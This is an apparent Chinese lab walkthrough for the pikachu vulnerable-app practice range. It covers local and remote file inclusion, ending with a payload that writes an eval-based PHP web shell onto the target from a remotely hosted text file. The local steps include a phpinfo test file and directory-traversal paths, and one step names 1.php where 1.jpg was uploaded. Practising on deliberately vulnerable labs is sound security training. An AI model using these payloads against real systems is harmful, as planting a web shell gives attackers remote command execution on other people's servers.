pikachu文件包含漏洞靶场攻略
一、File inclusion(local)(本地文件包含)
1.打开pikachu的本机包含文件靶场
2.随意提交查询
可以看到是get传参 可以在filename参数进行文件包含
3.准备好一个jpg文件
<?php phpinfo(); ?>将内容写到1.jpg中
点击上传文件 上传1.jpg
文件上传成功
4.filename后面输入../../../../1.php访问php文件
二、File Inclusion(remote)(远程文件包含)
一,修改配置
allow_url_fopen=on //默认打开
Allow_url_include=on //默认关闭
二,随意提交查询
三,宝塔公网上创建一个6.txt文件,
里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>